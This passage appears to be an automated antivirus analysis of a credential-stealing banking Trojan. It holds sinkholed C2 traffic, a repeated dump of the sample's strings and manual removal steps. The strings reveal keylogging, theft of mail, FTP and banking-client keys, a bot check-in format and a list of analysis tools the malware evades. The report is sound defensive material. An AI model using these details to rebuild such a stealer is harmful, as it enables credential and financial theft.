Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryhuzilywax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:57 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyruxyxaxaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocakemenir.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dimutobihom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:37 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close
HTTP/1.1 404 Not Found..Server: nginx 1.1.19..Date: Fri, 02 Sep 2016 1
7:41:37 GMT..X-Malware-Sinkhole: Arbor Networks..Connection: close..HT
TP/1.1 404 Not Found..Server: nginx 1.1.19..Date: Fri, 02 Sep 2016 17:
41:37 GMT..X-Malware-Sinkhole: Arbor Networks..Connection: close..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryleryqacic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: foxivusozuc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadufiwabim.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

55

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Explorer.EXE_532_rwx_02AF0000_000B8000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

SYSTEM!XP7!F9BE9A8A

%WinDir%\apppatch\vkyeif.exe

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

55

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:556
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\AppPatch\vkyeif.exe (1983 bytes)
   %System%\config\software (2132 bytes)
   %System%\config\SOFTWARE.LOG (4003 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.